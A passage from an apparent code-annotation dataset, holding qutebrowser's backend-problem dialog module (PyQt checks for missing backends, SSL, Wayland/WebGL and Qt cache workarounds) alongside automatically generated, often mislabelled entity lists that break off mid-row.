",72574,"[['PERSON', 'Brian Warner'], ['PERSON', 'NUMCOMMITS.gHASH'], ['DATE_TIME', '0.14'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'configparser'], ['PERSON', 'cfg.versionfile_source = get(parser'], ['PERSON', 'EnvironmentError'], ['PERSON', 'cfg.style'], ['PERSON', 'cfg.versionfile_source'], ['PERSON', 'EnvironmentError'], ['PERSON', 'dirname = os.path.basename(root'], ['PERSON', 'rootdir'], ['PERSON', 'dirname'], ['PERSON', 'dirname[len(parentdir_prefix'], ['PERSON', 'NotThisMethod(""no'], ['LOCATION', 'print(fmt'], ['LOCATION', 'n_seen'], ['DATE_TIME', 'n_seen'], ['LOCATION', '.git'], ['LOCATION', 'cfg.style'], ['PERSON', 'NotThisMethod(""no'], ['LOCATION', 'print(fmt'], ['NRP', 'f.write(""%s'], ['PERSON', 'dirname = os.path.basename(root'], ['PERSON', 'rootdir'], ['PERSON', 'dirname'], ['PERSON', 'dirname[len(parentdir_prefix'], ['PERSON', 'NotThisMethod(""no version_json'], ['PERSON', 'separators='], ['LOCATION', 'n_seen'], ['DATE_TIME', 'n_seen'], ['LOCATION', 'sys.modules'], ['PERSON', 'get_cmdclass'], ['PERSON', 'zipball'], ['PERSON', 'from_keywords_f'], ['PERSON', 'from_vcs_f'], ['LOCATION', 'cfg.style'], ['PERSON', 'get_cmdclass'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['PERSON', 'open(cfg.versionfile_source'], ['URL', 'cfg.ve'], ['PERSON', 'cfg.style'], ['PERSON', 'cfg.versionfile_source'], ['LOCATION', 'sys.modules'], ['NRP', 'distutils.command.sdist'], ['PERSON', 'hardlink'], ['PERSON', 'cfg.versionfile_source'], ['PERSON', 'versionfile_build'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'configparser.'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'configparser.'], ['PERSON', 'open(cfg.versionfile_source'], ['PERSON', 'cfg.style'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'MANIFEST.in'], ['PERSON', 'cfg.versionfile_source'], ['URL', 'https://github.com/warner/python-versioneer'], ['URL', 'https://pypip.in/version/versioneer/badge.svg?style=flat'], ['URL', 'https://pypi.python.org/pypi/versioneer/'], ['URL', 'https://travis-ci.org/warner/python-versioneer.png?branch=master'], ['URL', 'https://travis-ci.org/warner/python-versioneer'], ['URL', 'https://creativecommons.org/publicdomain/zero/1.0/'], ['URL', 'https://github.com/warner/python-versioneer'], ['URL', 'https://github.com/warner/python-versioneer/issues/52'], ['URL', 'http://docs.python.org/2/distutils/sourcedist.html#commands'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'versioneer.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'DISTANCE.gS'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'distutils.com'], ['URL', 'versioneer.ge'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'setup.cf'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'MANIFEST.in'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.ge'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'untagged.NUMCOMMITS.gH'], ['URL', 'setup.py'], ['URL', 'versioneer.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'DISTANCE.gH'], ['URL', 'details.md'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'version.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.VC'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'versioneer.py'], ['URL', 'make-versioneer.py'], ['URL', 'make-versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.py'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.path.jo'], ['URL', 'setup.py'], ['URL', 'os.path.jo'], ['URL', 'versioneer.py'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'setup.py'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'sys.ar'], ['URL', 'os.path.jo'], ['URL', 'setup.py'], ['URL', 'os.path.jo'], ['URL', 'versioneer.py'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'sys.ar'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'os.pa'], ['URL', 'versioneer.py'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'versioneer.py'], ['URL', 'os.pa'], ['URL', 'setup.cf'], ['URL', 'setup.cf'], ['URL', 'configparser.No'], ['URL', 'configparser.No'], ['URL', 'versioneer.py'], ['URL', 'setup.cf'], ['URL', 'os.path.jo'], ['URL', 'setup.cf'], ['URL', 'configparser.Sa'], ['URL', 'parser.re'], ['URL', 'parser.ge'], ['URL', 'parser.ge'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'git.cm'], ['URL', 'e.er'], ['URL', 'p.com'], ['URL', 'sys.ve'], ['URL', 'stdout.de'], ['URL', 'p.re'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py/versioneer.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'git.cm'], ['URL', 'e.er'], ['URL', 'p.com'], ['URL', 'sys.ve'], ['URL', 'stdout.de'], ['URL', 'p.re'], ['URL', 'os.path.ba'], ['URL', 'dirname.st'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'f.re'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'f.cl'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 're.se'], ['URL', 'ref.st'], ['URL', 'version.py'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'sys.pl'], ['URL', 'git.cm'], ['URL', 'out.st'], ['URL', 'out.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'tag.st'], ['URL', 'mo.gr'], ['URL', 'mo.gr'], ['URL', 'pieces.ge'], ['URL', 'DISTANCE.gH'], ['URL', '0.gH'], ['URL', 'untagged.DISTANCE.gH'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', 'part.is'], ['URL', '0.0.0.de'], ['URL', 'pieces.ge'], ['URL', 'replacements.it'], ['URL', 're.ma'], ['URL', 'pieces.ge'], ['URL', 'STYLES.ge'], ['URL', 'version.py'], ['URL', 'cfg.ve'], ['URL', 'os.path.re'], ['URL', 'cfg.ve'], ['URL', 'os.pa'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.pa'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'f.re'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'f.cl'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 're.se'], ['URL', 'ref.st'], ['URL', 'version.py'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'sys.pl'], ['URL', 'git.cm'], ['URL', 'out.st'], ['URL', 'out.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'tag.st'], ['URL', 'mo.gr'], ['URL', 'mo.gr'], ['URL', 'version.py'], ['URL', 'sys.pl'], ['URL', 'git.cm'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'versioneer.py'], ['URL', 'f.re'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'f.cl'], ['URL', 'f.cl'], ['URL', 'os.path.ba'], ['URL', 'dirname.st'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'f.re'], ['URL', 'version.py'], ['URL', 're.se'], ['URL', 'version.py'], ['URL', 'mo.gr'], ['URL', 'version.py'], ['URL', 'pieces.ge'], ['URL', 'DISTANCE.gH'], ['URL', '0.gH'], ['URL', 'untagged.DISTANCE.gH'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', 'part.is'], ['URL', '0.0.0.de'], ['URL', 'pieces.ge'], ['URL', 'replacements.it'], ['URL', 'name.re'], ['URL', 're.ma'], ['URL', 'pieces.ge'], ['URL', 'STYLES.ge'], ['URL', 'sys.mo'], ['URL', 'cmdclass.py'], ['URL', 'sys.mo'], ['URL', 'cfg.VC'], ['URL', 'setup.cf'], ['URL', 'HANDLERS.ge'], ['URL', 'cfg.VC'], ['URL', 'cfg.VC'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'versioneer.ve'], ['URL', 'os.path.jo'], ['URL', 'cfg.ve'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'handlers.ge'], ['URL', 'handlers.ge'], ['URL', 'handlers.ge'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.pa'], ['URL', 'sys.mo'], ['URL', 'sys.mo'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'sys.mo'], ['URL', 'setup.py'], ['URL', 'sys.mo'], ['URL', 'sys.mo'], ['URL', 'distutils.co'], ['URL', 'vers.ge'], ['URL', 'vers.ge'], ['URL', 'sys.mo'], ['URL', 'setuptools.com'], ['URL', 'distutils.com'], ['URL', 'py.ru'], ['URL', 'version.py'], ['URL', 'cfg.ve'], ['URL', 'os.path.jo'], ['URL', 'cfg.ve'], ['URL', 'sys.mo'], ['URL', 'cfg.ve'], ['URL', 'exe.ru'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'sys.mo'], ['URL', 'setuptools.command.sd'], ['URL', 'distutils.command.sd'], ['URL', 'self.distribution.metadata.ve'], ['URL', 'sdist.ru'], ['URL', 'sdist.ma'], ['URL', 'version.py'], ['URL', 'os.path.jo'], ['URL', 'cfg.ve'], ['URL', 'setup.cf'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'configparser.No'], ['URL', 'configparser.No'], ['URL', 'configparser.No'], ['URL', 'setup.cf'], ['URL', 'sys.st'], ['URL', 'os.path.jo'], ['URL', 'setup.cf'], ['URL', 'sys.st'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'cfg.ve'], ['URL', 'os.pa'], ['URL', 'f.re'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'MANIFEST.in'], ['URL', 'os.path.jo'], ['URL', 'MANIFEST.in'], ['URL', 'line.st'], ['URL', 'includes.ad'], ['URL', 'MANIFEST.in'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'MANIFEST.in'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'MANIFEST.in'], ['URL', 'cfg.ve'], ['URL', 'MANIFEST.in'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'MANIFEST.in'], ['URL', 'version.py'], ['URL', 'cfg.ve'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'f.re'], ['URL', 'found.ad'], ['URL', 'versioneer.ge'], ['URL', 'found.ad'], ['URL', 'versioneer.ge'], ['URL', 'found.ad'], ['URL', 'versioneer.VC'], ['URL', 'versioneer.ve'], ['URL', 'setup.py'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.VC'], ['URL', 'versioneer.ve'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'sys.ar']]"
109,"# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2017-2021 Florian Bruhin (The Compiler) dummy@email.com
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see .
""""""Dialogs shown when there was a problem with a backend choice.""""""
import os
import sys
import functools
import html
import enum
import shutil
import argparse
import dataclasses
from typing import Any, List, Sequence, Tuple, Optional
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import (QDialog, QPushButton, QHBoxLayout, QVBoxLayout, QLabel,
QMessageBox, QWidget)
from PyQt5.QtNetwork import QSslSocket
from qutebrowser.config import config, configfiles
from qutebrowser.utils import (usertypes, version, qtutils, log, utils,
standarddir)
from qutebrowser.misc import objects, msgbox, savemanager, quitter
class _Result(enum.IntEnum):
""""""The result code returned by the backend problem dialog.""""""
quit = QDialog.Accepted + 1
restart = QDialog.Accepted + 2
restart_webkit = QDialog.Accepted + 3
restart_webengine = QDialog.Accepted + 4
@dataclasses.dataclass
class _Button:
""""""A button passed to BackendProblemDialog.""""""
text: str
setting: str
value: Any
default: bool = False
def _other_backend(backend: usertypes.Backend) -> Tuple[usertypes.Backend, str]:
""""""Get the other backend enum/setting for a given backend.""""""
other_backend = {
usertypes.Backend.QtWebKit: usertypes.Backend.QtWebEngine,
usertypes.Backend.QtWebEngine: usertypes.Backend.QtWebKit,
}[backend]
other_setting = other_backend.name.lower()[2:]
return (other_backend, other_setting)
def _error_text(because: str, text: str, backend: usertypes.Backend) -> str:
""""""Get an error text for the given information.""""""
other_backend, other_setting = _other_backend(backend)
if other_backend == usertypes.Backend.QtWebKit:
warning = (""Note that QtWebKit hasn't been updated since ""
""July 2017 (including security updates). "")
suffix = "" (not recommended)""
else:
warning = """"
suffix = """"
return (""Failed to start with the {backend} backend! ""
""qutebrowser tried to start with the {backend} backend but ""
""failed because {because}.
{text}""
""Forcing the {other_backend.name} backend{suffix}
""
""This forces usage of the {other_backend.name} backend by ""
""setting the backend = '{other_setting}' option ""
""(if you have a config.py file, you'll need to set ""
""this manually). {warning}
"".format(
backend=backend.name, because=because, text=text,
other_backend=other_backend, other_setting=other_setting,
warning=warning, suffix=suffix))
class _Dialog(QDialog):
""""""A dialog which gets shown if there are issues with the backend.""""""
def __init__(self, *, because: str,
text: str,
backend: usertypes.Backend,
buttons: Sequence[_Button] = None,
parent: QWidget = None) -> None:
super().__init__(parent)
vbox = QVBoxLayout(self)
other_backend, other_setting = _other_backend(backend)
text = _error_text(because, text, backend)
label = QLabel(text)
label.setWordWrap(True)
label.setTextFormat(Qt.RichText)
vbox.addWidget(label)
hbox = QHBoxLayout()
buttons = [] if buttons is None else buttons
quit_button = QPushButton(""Quit"")
quit_button.clicked.connect(lambda: self.done(_Result.quit))
hbox.addWidget(quit_button)
backend_text = ""Force {} backend"".format(other_backend.name)
if other_backend == usertypes.Backend.QtWebKit:
backend_text += ' (not recommended)'
backend_button = QPushButton(backend_text)
backend_button.clicked.connect(functools.partial(
self._change_setting, 'backend', other_setting))
hbox.addWidget(backend_button)
for button in buttons:
btn = QPushButton(button.text)
btn.setDefault(button.default)
btn.clicked.connect(functools.partial(
self._change_setting, button.setting, button.value))
hbox.addWidget(btn)
vbox.addLayout(hbox)
def _change_setting(self, setting: str, value: str) -> None:
""""""Change the given setting and restart.""""""
config.instance.set_obj(setting, value, save_yaml=True)
if setting == 'backend' and value == 'webkit':
self.done(_Result.restart_webkit)
elif setting == 'backend' and value == 'webengine':
self.done(_Result.restart_webengine)
else:
self.done(_Result.restart)
@dataclasses.dataclass
class _BackendImports:
""""""Whether backend modules could be imported.""""""
webkit_error: Optional[str] = None
webengine_error: Optional[str] = None
class _BackendProblemChecker:
""""""Check for various backend-specific issues.""""""
def __init__(self, *,
no_err_windows: bool,
save_manager: savemanager.SaveManager) -> None:
self._save_manager = save_manager
self._no_err_windows = no_err_windows
def _show_dialog(self, *args: Any, **kwargs: Any) -> None:
""""""Show a dialog for a backend problem.""""""
if self._no_err_windows:
text = _error_text(*args, **kwargs)
print(text, file=sys.stderr)
sys.exit(usertypes.Exit.err_init)
dialog = _Dialog(*args, **kwargs)
status = dialog.exec()
self._save_manager.save_all(is_exit=True)
if status in [_Result.quit, QDialog.Rejected]:
pass
elif status == _Result.restart_webkit:
quitter.instance.restart(override_args={'backend': 'webkit'})
elif status == _Result.restart_webengine:
quitter.instance.restart(override_args={'backend': 'webengine'})
elif status == _Result.restart:
quitter.instance.restart()
else:
raise utils.Unreachable(status)
sys.exit(usertypes.Exit.err_init)
def _nvidia_shader_workaround(self) -> None:
""""""Work around QOpenGLShaderProgram issues.
See https://bugs.launchpad.net/ubuntu/+source/python-qt4/+bug/941826
""""""
self._assert_backend(usertypes.Backend.QtWebEngine)
utils.libgl_workaround()
def _xwayland_options(self) -> Tuple[str, List[_Button]]:
""""""Get buttons/text for a possible XWayland solution.""""""
buttons = []
text = ""You can work around this in one of the following ways:
""
if 'DISPLAY' in os.environ:
# XWayland is available, but QT_QPA_PLATFORM=wayland is set
buttons.append(
_Button(""Force XWayland"", 'qt.force_platform', 'xcb'))
text += (""Force Qt to use XWayland
""
""This allows you to use the newer QtWebEngine backend ""
""(based on Chromium). ""
""This sets the qt.force_platform = 'xcb' option ""
""(if you have a config.py file, you'll need to ""
""set this manually).
"")
else:
text += (""Set up XWayland
""
""This allows you to use the newer QtWebEngine backend ""
""(based on Chromium). "")
return text, buttons
def _handle_wayland_webgl(self) -> None:
""""""On older graphic hardware, WebGL on Wayland causes segfaults.
See https://github.com/qutebrowser/qutebrowser/issues/5313
""""""
self._assert_backend(usertypes.Backend.QtWebEngine)
if os.environ.get('QUTE_SKIP_WAYLAND_WEBGL_CHECK'):
return
platform = objects.qapp.platformName()
if platform not in ['wayland', 'wayland-egl']:
return
# Only Qt 5.14 should be affected
if not qtutils.version_check('5.14', compiled=False):
return
if qtutils.version_check('5.15', compiled=False):
return
# Newer graphic hardware isn't affected
opengl_info = version.opengl_info()
if (opengl_info is None or
opengl_info.gles or
opengl_info.version is None or
opengl_info.version >= (4, 3)):
return
# If WebGL is turned off, we're fine
if not config.val.content.webgl:
return
text, buttons = self._xwayland_options()
buttons.append(_Button(""Turn off WebGL (recommended)"",
'content.webgl',
False))
text += (""
Disable WebGL (recommended)
""
""This sets the content.webgl = False option ""
""(if you have a config.py file, you'll need to ""
""set this manually)."")
self._show_dialog(backend=usertypes.Backend.QtWebEngine,
because=(""of frequent crashes with Qt 5.14 on ""
""Wayland with older graphics hardware""),
text=text,
buttons=buttons)
def _try_import_backends(self) -> _BackendImports:
""""""Check whether backends can be imported and return BackendImports.""""""
# pylint: disable=unused-import
results = _BackendImports()
try:
from PyQt5 import QtWebKit
from PyQt5.QtWebKit import qWebKitVersion
from PyQt5 import QtWebKitWidgets
except (ImportError, ValueError) as e:
results.webkit_error = str(e)
else:
if not qtutils.is_new_qtwebkit():
results.webkit_error = ""Unsupported legacy QtWebKit found""
try:
from PyQt5 import QtWebEngineWidgets
except (ImportError, ValueError) as e:
results.webengine_error = str(e)
return results
def _handle_ssl_support(self, fatal: bool = False) -> None:
""""""Check for full SSL availability.
If ""fatal"" is given, show an error and exit.
""""""
if QSslSocket.supportsSsl():
return
if qtutils.version_check('5.12.4'):
version_text = (""If you use OpenSSL 1.0 with a PyQt package from ""
""PyPI (e.g. on Ubuntu 16.04), you will need to ""
""build OpenSSL 1.1 from sources and set ""
""LD_LIBRARY_PATH accordingly."")
else:
version_text = (""If you use OpenSSL 1.1 with a PyQt package from ""
""PyPI (e.g. on Archlinux or Debian Stretch), you ""
""need to set LD_LIBRARY_PATH to the path of ""
""OpenSSL 1.0 or use Qt >= 5.12.4."")
text = (""Could not initialize QtNetwork SSL support. {} This only ""
""affects downloads and :adblock-update."".format(version_text))
if fatal:
errbox = msgbox.msgbox(parent=None,
title=""SSL error"",
text=""Could not initialize SSL support."",
icon=QMessageBox.Critical,
plain_text=False)
errbox.exec()
sys.exit(usertypes.Exit.err_init)
assert not fatal
log.init.warning(text)
def _check_backend_modules(self) -> None:
""""""Check for the modules needed for QtWebKit/QtWebEngine.""""""
imports = self._try_import_backends()
if not imports.webkit_error and not imports.webengine_error:
return
elif imports.webkit_error and imports.webengine_error:
text = (""qutebrowser needs QtWebKit or QtWebEngine, but ""
""neither could be imported!
""
""The errors encountered were:
""
""QtWebKit: {webkit_error}""
""QtWebEngine: {webengine_error}""
"" "".format(
webkit_error=html.escape(imports.webkit_error),
webengine_error=html.escape(imports.webengine_error)))
errbox = msgbox.msgbox(parent=None,
title=""No backend library found!"",
text=text,
icon=QMessageBox.Critical,
plain_text=False)
errbox.exec()
sys.exit(usertypes.Exit.err_init)
elif objects.backend == usertypes.Backend.QtWebKit:
if not imports.webkit_error:
return
self._show_dialog(
backend=usertypes.Backend.QtWebKit,
because=""QtWebKit could not be imported"",
text=""The error encountered was: {}
"".format(
html.escape(imports.webkit_error))
)
elif objects.backend == usertypes.Backend.QtWebEngine:
if not imports.webengine_error:
return
self._show_dialog(
backend=usertypes.Backend.QtWebEngine,
because=""QtWebEngine could not be imported"",
text=""The error encountered was: {}
"".format(
html.escape(imports.webengine_error))
)
raise utils.Unreachable
def _handle_cache_nuking(self) -> None:
""""""Nuke the QtWebEngine cache if the Qt version changed.
WORKAROUND for https://bugreports.qt.io/browse/QTBUG-72532
""""""
if not configfiles.state.qt_version_changed:
return
# Only nuke the cache in cases where we know there are problems.
# It seems these issues started with Qt 5.12.
# They should be fixed with Qt 5.12.5:
# https://codereview.qt-project.org/c/qt/qtwebengine-chromium/+/265408
if qtutils.version_check('5.12.5', compiled=False):
return
log.init.info(""Qt version changed, nuking QtWebEngine cache"")
cache_dir = os.path.join(standarddir.cache(), 'webengine')
if os.path.exists(cache_dir):
shutil.rmtree(cache_dir)
def _handle_serviceworker_nuking(self) -> None:
""""""Nuke the service workers directory if the Qt version changed.
WORKAROUND for:
https://bugreports.qt.io/browse/QTBUG-72532
https://bugreports.qt.io/browse/QTBUG-82105
""""""
if ('serviceworker_workaround' not in configfiles.state['general'] and
qtutils.version_check('5.14', compiled=False)):
# Nuke the service worker directory once for every install with Qt
# 5.14, given that it seems to cause a variety of segfaults.
configfiles.state['general']['serviceworker_workaround'] = '514'
affected = True
else:
# Otherwise, just nuke it when the Qt version changed.
affected = configfiles.state.qt_version_changed
if not affected:
return
service_worker_dir = os.path.join(standarddir.data(), 'webengine',
'Service Worker')
bak_dir = service_worker_dir + '-bak'
if not os.path.exists(service_worker_dir):
return
log.init.info(""Qt version changed, removing service workers"")
# Keep one backup around - we're not 100% sure what persistent data
# could be in there, but this folder can grow to ~300 MB.
if os.path.exists(bak_dir):
shutil.rmtree(bak_dir)
shutil.move(service_worker_dir, bak_dir)
def _assert_backend(self, backend: usertypes.Backend) -> None:
assert objects.backend == backend, objects.backend
def check(self) -> None:
""""""Run all checks.""""""
self._check_backend_modules()
if objects.backend == usertypes.Backend.QtWebEngine:
self._handle_ssl_support()
self._nvidia_shader_workaround()
self._handle_wayland_webgl()
self._handle_cache_nuking()
self._handle_serviceworker_nuking()
else:
self._assert_backend(usertypes.Backend.QtWebKit)
self._handle_ssl_support(fatal=True)
def init(*, args: argparse.Namespace,
save_manager: savemanager.SaveManager) -> None:
""""""Run all checks.""""""
checker = _BackendProblemChecker(no_err_windows=args.no_err_windows,
save_manager=save_manager)
checker.check()
",17433,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'sw=4'], ['DATE_TIME', '2017-2021'], ['PERSON', 'Florian Bruhin'], ['LOCATION', 'qutebrowser'], ['PERSON', 'qutebrowser'], ['PERSON', 'QPushButton'], ['LOCATION', 'configfiles'], ['PERSON', 'standarddir'], ['LOCATION', 'Result(enum'], ['DATE_TIME', 'July 2017'], ['PERSON', 'vbox'], ['PERSON', 'hbox'], ['PERSON', 'quit_button'], ['LOCATION', 'wayland'], ['LOCATION', 'Wayland'], ['DATE_TIME', 'Only Qt 5.14'], ['PERSON', ""qtutils.version_check('5.15""], ['DATE_TIME', '5.14'], ['LOCATION', 'Wayland'], ['NRP', 'PyQt'], ['NRP', 'PyQt'], ['PERSON', 'text=""Could'], ['DATE_TIME', '5.14'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'https://bugs.launchpad.net/ubuntu/+source/python-qt4/+bug/941826'], ['URL', 'https://github.com/qutebrowser/qutebrowser/issues/5313'], ['URL', 'https://bugreports.qt.io/browse/QTBUG-72532'], ['URL', 'https://codereview.qt-project.org/c/qt/qtwebengine-chromium/+/265408'], ['URL', 'https://bugreports.qt.io/browse/QTBUG-72532'], ['URL', 'https://bugreports.qt.io/browse/QTBUG-82105'], ['URL', 'email.com'], ['URL', 'qutebrowser.co'], ['URL', 'enum.Int'], ['URL', 'QDialog.Ac'], ['URL', 'QDialog.Ac'], ['URL', 'QDialog.Ac'], ['URL', 'QDialog.Ac'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'backend.na'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'backend.na'], ['URL', 'backend.na'], ['URL', 'config.py'], ['URL', 'backend.na'], ['URL', 'usertypes.Ba'], ['URL', 'label.se'], ['URL', 'label.se'], ['URL', 'vbox.ad'], ['URL', 'button.clicked.co'], ['URL', 'self.do'], ['URL', 'hbox.ad'], ['URL', 'backend.na'], ['URL', 'usertypes.Ba'], ['URL', 'button.clicked.co'], ['URL', 'functools.pa'], ['URL', 'hbox.ad'], ['URL', 'btn.se'], ['URL', 'button.de'], ['URL', 'btn.clicked.co'], ['URL', 'functools.pa'], ['URL', 'button.se'], ['URL', 'button.va'], ['URL', 'hbox.ad'], ['URL', 'vbox.ad'], ['URL', 'config.instance.se'], ['URL', 'self.do'], ['URL', 'Result.re'], ['URL', 'self.do'], ['URL', 'Result.re'], ['URL', 'self.do'], ['URL', 'Result.re'], ['URL', 'savemanager.Sa'], ['URL', 'sys.st'], ['URL', 'usertypes.Exit.er'], ['URL', 'manager.sa'], ['URL', 'QDialog.Re'], ['URL', 'Result.re'], ['URL', 'quitter.instance.re'], ['URL', 'Result.re'], ['URL', 'quitter.instance.re'], ['URL', 'Result.re'], ['URL', 'quitter.instance.re'], ['URL', 'usertypes.Exit.er'], ['URL', 'usertypes.Ba'], ['URL', 'utils.li'], ['URL', 'qt.fo'], ['URL', 'qt.fo'], ['URL', 'config.py'], ['URL', 'usertypes.Ba'], ['URL', 'os.environ.ge'], ['URL', 'objects.qapp.pl'], ['URL', 'qtutils.ve'], ['URL', 'qtutils.ve'], ['URL', 'info.gl'], ['URL', 'info.ve'], ['URL', 'info.ve'], ['URL', 'config.val.co'], ['URL', 'config.py'], ['URL', 'usertypes.Ba'], ['URL', 'qtutils.is'], ['URL', 'QSslSocket.su'], ['URL', 'qtutils.ve'], ['URL', 'msgbox.ms'], ['URL', 'QMessageBox.Cr'], ['URL', 'usertypes.Exit.er'], ['URL', 'log.in'], ['URL', 'html.es'], ['URL', 'html.es'], ['URL', 'msgbox.ms'], ['URL', 'QMessageBox.Cr'], ['URL', 'usertypes.Exit.er'], ['URL', 'objects.ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'html.es'], ['URL', 'objects.ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'html.es'], ['URL', 'configfiles.st'], ['URL', 'qtutils.ve'], ['URL', 'log.init.in'], 